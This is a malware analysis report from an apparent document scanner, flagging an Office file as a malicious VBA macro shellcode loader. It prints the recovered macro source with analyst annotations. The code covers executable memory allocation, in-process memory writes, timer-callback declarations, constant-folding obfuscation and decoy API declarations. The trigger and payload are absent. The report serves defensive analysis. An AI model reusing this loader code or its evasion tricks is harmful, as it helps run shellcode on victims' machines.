Verdict: MALICIOUS
Risk Score: 82
Heuristics: 3
-
Raw OLE macro native-memory callback shellcode loader — severity: critical — OLE_RAW_MACRO_NATIVE_MEMORY_CALLBACK_LOADER: Raw OLE/VBA project text contains an auto-exec entry plus native memory allocation, process-memory write/copy, and callback/timer execution APIs. This catches source-stomped or partially recovered VBA loaders where the extracted macro source omits the auto-run entry, but the compiled/source project bytes still expose the in-memory shellcode loader triad.
-
VBA macros detected — severity: medium — OLE_VBA_MACROS: Document contains VBA macro code.
-
Embedded URL — severity: info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://www.eastoftheweb.com/short-stories/UBooks/JereMagi942.shtml — In document text (OLE body)
- http://ns.adobe.com/xap/1.0/ — In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns# — In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/ — In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef# — In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliography — In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXml — In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: ae990ab2d6f06f82402b627cf6e15fe22f737a2c96029645b8240d702749d22b) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6601 bytes |
Preview script — first 1,000 lines of the extracted script:
Attribute VB_Name = "portos"
' --- Analyst annotation (report review) ---
' Module "portos": holds the loader's memory-write primitive declaration and the
' helpers endowed() and zambia() further down. The lyric-like comment lines
' interleaved with the declarations are filler and are kept verbatim as recovered
' (including their mojibake, e.g. "A¶"/"AY"), since they are part of the sample.
' Every "#If" guard in this project is constant-folded noise around one real term:
' (13*3+5)=44 > (8-3*1)=5 is always True and (88-11*8)*30 = 0, so the test is
' just "0 < Win64" -- i.e. the branch is taken only under 64-bit Office.
' His passion is a kiss
' Your love I can't dismiss
#If (13 * 3 + 5) > (8 - 3 * 1) And (88 - 11 * 8) * 30 < (Win64) Then
' Stirb nicht
' Dont die before I do
' 64-bit: "summary" = ntdll!NtWriteVirtualMemory. The Lib name carries a trailing
' space ("ntdll "), which reads as an attempt to defeat exact-string matching on
' the library name -- NOTE(review): confirm whether Office still resolves it.
Public Declare PtrSafe Function summary _
Lib "ntdll " Alias _
"NtWriteVirtualMemory" (ByVal degeneration As Any, ByVal somatotropin As Any, ByVal caduceus As Any, ByVal monasticism As Any, ByVal amotion As Any) As LongPtr
' Ich warte hier
' I dont know who you are
' Decoy: GetOverlappedResult is declared from "Shlwapi.dll " (its real export is in
' kernel32) and "euphorbium" is never referenced in the recovered source.
Public Declare PtrSafe Function euphorbium Lib "Shlwapi.dll " Alias "GetOverlappedResult" (ByVal chipping As Any, gangrenous As Any, categorial As Any, aerodynamics As Any) As LongPtr
' Die Nacht A¶ffnet ihren SchoAY
' Ich weine leise in die Zeit
#End If
' Die Nacht A¶ffnet ihren SchoAY
' Es ist kalt und regungslos
' Same guard with "And Not": taken only under 32-bit Office.
#If (13 * 3 + 5) > (8 - 3 * 1) And Not (88 - 11 * 8) * 30 < (Win64) Then
' I dont know who you are
' 32-bit decoy twin of "euphorbium"; also unreferenced in the recovered source.
Public Declare Function carelessly Lib "Shlwapi.dll " Alias "GetOverlappedResult" (ByVal noahs As Any, fortunately As Any, denounce As Any, synchrocyclotron As Any) As Long
' I dont know who he is
' Ich weiAY dass irgendwann
#End If
' Doch ich weiAY dass es dich gibt
' Ich weine leise in die Zeit
' endowed(dest, src, len): in-process memory copy wrapped around NtWriteVirtualMemory
' ("summary", declared per-architecture in modules portos / mildran).
' Argument roles follow from the call at the bottom of the function:
'   horrifyingly  -> cenchrus          -> target address (2nd NtWriteVirtualMemory arg)
'   flyfishing    -> ephemerality      -> source buffer  (3rd arg)
'   obliteration  -> uncommunicativeness -> byte count   (4th arg)
'   although                            -> receives the bytes-written output (5th arg)
' No value is ever assigned to "endowed", so the function returns Empty and the
' NTSTATUS from the write is discarded (no error handling anywhere in the loader).
Function endowed(horrifyingly, flyfishing, obliteration)
' Guard folds to "0 < Win64": 64-bit locals are pointer-sized.
#If (7 * 4 + 5) > (7 - 2 * 1) And (20 - 5 * 4) * 2 < (Win64) Then
Dim rescription As LongPtr
Dim cenchrus As LongPtr
Dim although As LongPtr
Dim ephemerality As LongPtr
Dim uncommunicativeness As LongPtr
#End If
' Guard folds to "700 > -220 And Not (0 < Win64)": 32-bit locals are Long.
' "expiable" is declared only here and never used.
#If (44 - 40 + 396 + 120 - 65 + 245) > ((58 - 7 + 269) - (47 - 37 + 530) * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim cenchrus As Long
Dim rescription As Long
Dim ephemerality As Long
Dim although As Long
Dim expiable As String
Dim uncommunicativeness As Long
#End If
cenchrus = horrifyingly
uncommunicativeness = obliteration
ephemerality = flyfishing
' Junk: 60+48 = 108, fed to VBA's financial Pmt() whose result is discarded, then
' an unused Rnd() call. Both only pad the function for heuristics/entropy.
chancroidal = 60 + 48
Pmt 0, chancroidal, 22143, 18381, 4
adenoidal = Rnd(83)
' 35-74+38 = -1: the current-process pseudo-handle, so this writes into its own process.
rescription = 35 - 74 + 38
' NtWriteVirtualMemory(-1, dest, src, len, &bytesWritten)
summary ByVal rescription, cenchrus, ephemerality, uncommunicativeness, although
' Junk assignment; "naja" is never read.
naja = "bever"
End Function
' zambia(): builds and returns a 256-entry Byte table mapping base64 alphabet
' characters to their 6-bit values: 'A'..'Z' (65..90) -> 0..25, '0'..'9' (48..57)
' -> 52..61, 'a'..'z' (97..122) -> 26..51, '/' (47) -> 63, '+' (43) -> 62.
' Each loop bound overshoots the alphabet by one (91, 58, 123 are also filled),
' which is harmless for lookups of valid base64 input. The function is not called
' anywhere in the recovered source -- NOTE(review): the decode routine that would
' use it is presumably in the stomped/missing part of the project.
Function zambia()
Dim bi(255) As Byte
' 16-86+135 = 65 ('A'); loop runs while index <= 91.
coniferopsida = 16 - 86 + 135
Do While coniferopsida <= 90 + 1
bi(coniferopsida) = coniferopsida - 65
coniferopsida = coniferopsida + 1
Loop
' 48 ('0'); loop runs while index <= 58; value = index + 4 -> 52..62.
coniferopsida = 48
Do While coniferopsida <= 50 + 8
bi(coniferopsida) = coniferopsida + 4
coniferopsida = coniferopsida + 1
Loop
' 97 ('a'); loop runs while index <= 123; value = index - 71 -> 26..52.
coniferopsida = 97
Do While coniferopsida <= 120 + 3
bi(coniferopsida) = coniferopsida - 71
coniferopsida = coniferopsida + 1
Loop
' '/' -> 63 and '+' -> 60+2 = 62 complete the standard alphabet.
bi(47) = 63
coniferopsida = 43
bi(coniferopsida) = 60 + 2
' Returned as a Variant holding the Byte array (no declared return type).
zambia = bi
End Function
Attribute VB_Name = "mildran"
' --- Analyst annotation (report review) ---
' Module "mildran": the allocation primitive for 64-bit and the write primitive
' for 32-bit. Declarations are deliberately scattered across modules and
' architecture branches (the 32-bit NtAllocateVirtualMemory lives in "sideboard",
' the 64-bit NtWriteVirtualMemory in "portos"), so no single module shows the
' full allocate/write/execute triad. Guard folds to "0 < Win64" as elsewhere.
#If (13 * 3 + 5) > (8 - 3 * 1) And (88 - 11 * 8) * 30 < (Win64) Then
' 64-bit: "homocercal" = ntdll!NtAllocateVirtualMemory (trailing space in Lib name again).
' The identifier "pandiculationByVal" has the ByVal keyword fused into the name, so
' that parameter (RegionSize) is passed ByRef by default -- which is what the
' callee expects for a pointer-to-size argument.
Public Declare _
PtrSafe Function homocercal Lib "ntdll " Alias _
"NtAllocateVirtualMemory" (mb As LongPtr, draped As LongPtr, ByVal halfhearted As LongPtr, pandiculationByVal As LongPtr, professionalism As LongPtr, ByVal meryta As LongPtr) As LongPtr
' 32-bit: "summary" = ntdll!NtWriteVirtualMemory with Long parameters.
#ElseIf (13 * 3 + 5) > (8 - 3 * 1) And Not (88 - 11 * 8) * 30 < (Win64) Then
Public Declare Function summary Lib "ntdll " Alias "NtWriteVirtualMemory" (ByVal ademption As Any, ByVal accredit As Any, ByVal transit As Any, ByVal absolved As Any, ByVal arma As Any) As Long
#End If
' eyelid(payload): the core of the in-memory loader. It (1) extracts a raw data
' pointer from the Variant argument, (2) allocates an executable region in the
' current process, (3) copies 5883 bytes of payload into it, and (4) returns the
' region's base address. Nothing in the recovered source calls eyelid() or
' invokes the CreateTimerQueueTimer declarations ("clarinetist"), which matches
' the report's note that the auto-exec / trigger code is missing from the
' extracted macro text. All API return values (polemonium, intermezzo) are ignored.
Function eyelid(kriegspiel)
' 32-bit branch ("And Not ... < Win64"): architeuthis = 44-59+19 = 4 (pointer size).
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim cosmetologist As Long
architeuthis = 44 - 59 + 19
Dim homophonic As Long
Dim philosophers As Long
#End If
' 64-bit branch: architeuthis = 6-68+70 = 8 (pointer size).
#If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then
Dim cosmetologist As LongPtr
architeuthis = 6 - 68 + 70
Dim homophonic As LongPtr
Dim philosophers As LongPtr
#End If
' Step 1: copy one pointer (4 or 8 bytes) from offset 8 of the Variant "kriegspiel"
' into the local "cosmetologist". NOTE(review): offset 8 is the VARIANT data
' union, so this presumably yields a pointer to the payload bytes/array the caller
' passed in -- confirm against the (missing) caller which type is actually passed.
besieged = VarPtr(cosmetologist)
polemonium = endowed(besieged, VarPtr(kriegspiel) + 8, architeuthis)
' Step 2 constants, each hidden behind arithmetic:
'   real         = 125-95-31   = -1    -> current-process pseudo-handle
'   homophonic   = 91-108+17   = 0     -> BaseAddress = NULL (let the OS choose)
'   mirror       = 40-120+80   = 0     -> ZeroBits
'   philosophers = 86-108+9379 = 9357  -> RegionSize (bytes)
'   droplet      = 29-117+4184 = 4096  -> 0x1000 = MEM_COMMIT
'   disheartened = 124-67+7    = 64    -> 0x40   = PAGE_EXECUTE_READWRITE
real = 125 - 95 - 31
homophonic = 91 - 108 + 17
mirror = 40 - 120 + 80
philosophers = 86 - 108 + 9379
droplet = 29 - 117 + 4184
disheartened = 124 - 67 + 7
' NtAllocateVirtualMemory(-1, &homophonic, 0, &philosophers, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
' on success "homophonic" holds the base of the new RWX region. Status not checked.
intermezzo = homocercal(ByVal real, _
homophonic, ByVal mirror, philosophers, ByVal droplet, _
ByVal disheartened)
' Step 3: NtWriteVirtualMemory(-1, region, payloadPtr, 73-70+5880 = 5883 bytes).
endowed homophonic, cosmetologist, 73 - 70 + 5880
' Junk: 44+32 = 76 fed to Pmt(), result discarded (padding).
necrology = 44 + 32
Pmt 0, necrology, 32324, 46690, 8
' Step 4: return the executable region's base address to the (missing) caller.
eyelid = homophonic
End Function
' atopognosia(a, b, op): tiny arithmetic dispatcher selected by an operator code.
' The Case expressions fold to 48 (integer division "\"), 58 (bitwise And) and
' 66 (multiplication). Any other code leaves the return value Empty. Not called
' anywhere in the recovered source; it likely belongs to the missing decode /
' de-obfuscation stage -- NOTE(review): unverifiable from this listing.
Function atopognosia(nerodia, papyrus, caterpillar)
Select Case caterpillar
' 48 + (5 - 5) = 48
Case 48 + (10 / 2 - 5)
atopognosia = nerodia \ papyrus
' 58 + 1 - 1 = 58
Case 58 + (5 - 3) / 2 - 1
atopognosia = nerodia And papyrus
' 66 + (8 - 8) = 66
Case 66 + (56 / 7 - 4 * 2)
atopognosia = nerodia * papyrus
End Select
End Function
Attribute VB_Name = "sideboard"
' --- Analyst annotation (report review) ---
' Module "sideboard": the execution primitive (CreateTimerQueueTimer, declared as
' "clarinetist" for both architectures) plus the 32-bit allocation primitive and
' two unreferenced SleepConditionVariableSRW decoys. Together with modules portos
' and mildran this completes the allocate / write / timer-callback triad named by
' the OLE_RAW_MACRO_NATIVE_MEMORY_CALLBACK_LOADER heuristic. No call to
' "clarinetist" survives in the recovered source. Lyric filler lines kept as recovered.
' Es ist kalt und regungslos
' 32-bit branch ("And Not ... < Win64").
#If (13 * 3 + 5) > (8 - 3 * 1) And Not (88 - 11 * 8) * 30 < (Win64) Then
' Die Nacht A¶ffnet ihren SchoAY
' Ich weiAY nicht wie du heiAYt
' Kernel32!CreateTimerQueueTimer -- the timer-callback execution API.
Public Declare Function clarinetist _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (obstinate As Any, ByVal aminomethane As Any, ByVal defy As Any, ByVal elre As Any, ByVal nfor As Any, ByVal bise As Any, ByVal allophonic As Any) As Long
' Sometimes love seems so far
' Dont die before I do
' 32-bit ntdll!NtAllocateVirtualMemory (Long parameters; trailing space in Lib name).
' "euphractusByVal" again has ByVal fused into the identifier (parameter is ByRef).
Public Declare Function homocercal Lib _
"ntdll " Alias _
"NtAllocateVirtualMemory" (hindustan As Long, angler As Long, ByVal dislikable As Long, euphractusByVal As Long, retribution As Long, ByVal arrogance As Long) As Long
' I close my eyes and pass away
' I dont know who you are
' Decoy: SleepConditionVariableSRW declared from "Shlwapi.dll " (real export is in
' kernel32); "sod" is never referenced.
Public Declare Function sod Lib "Shlwapi.dll " Alias "SleepConditionVariableSRW" (ByVal homespun As Any, decolonization As Any, audile As Any, drip As Any) As Long
' Ich warte hier
' irgendwer mich liebt
#End If
' His passion is a kiss
' Your love I can't dismiss
' 64-bit branch.
#If (13 * 3 + 5) > (8 - 3 * 1) And (88 - 11 * 8) * 30 < (Win64) Then
' Stirb nicht
' No words are left to say
' Decoy twin of "sod" for 64-bit; unreferenced.
Public Declare PtrSafe Function planococcus Lib "Shlwapi.dll " _
Alias "SleepConditionVariableSRW" (ByVal cacation As Any, faciles As Any, diethylstilbestrol As Any, barbecuing As Any) As LongPtr
' Doch ich weiAY dass es dich gibt
' Ich weiAY dass irgendwann
' 64-bit Kernel32!CreateTimerQueueTimer (note: return type left as Long, not LongPtr).
Public Declare PtrSafe Function clarinetist _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (aerography As Any, ByVal custacean As Any, ByVal shihtzu As Any, ByVal blastoderm As Any, ByVal bobble As Any, ByVal coadjutor As Any, ByVal phasianus As Any) As Long
' Ich weine leise in die Zeit
#End If
Attribute VB_Name = "unwelcome"
Attribute VB_Base = "0{BEDAA815-8A97-4A26-8D30-53369C8F0A8B}{09205486-3054-4B45-A06E-0137BB9F7141}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' --- Analyst annotation (report review) ---
' Module "unwelcome": only the class/document-module attribute header was recovered
' (VB_PredeclaredId = True is the document-module pattern); no procedure text
' follows. This is where an auto-exec entry point would normally live, so its
' absence here is consistent with the source-stomped / partially recovered
' loader the OLE_RAW_MACRO_NATIVE_MEMORY_CALLBACK_LOADER heuristic describes --
' NOTE(review): verify against the compiled p-code rather than this decoded text.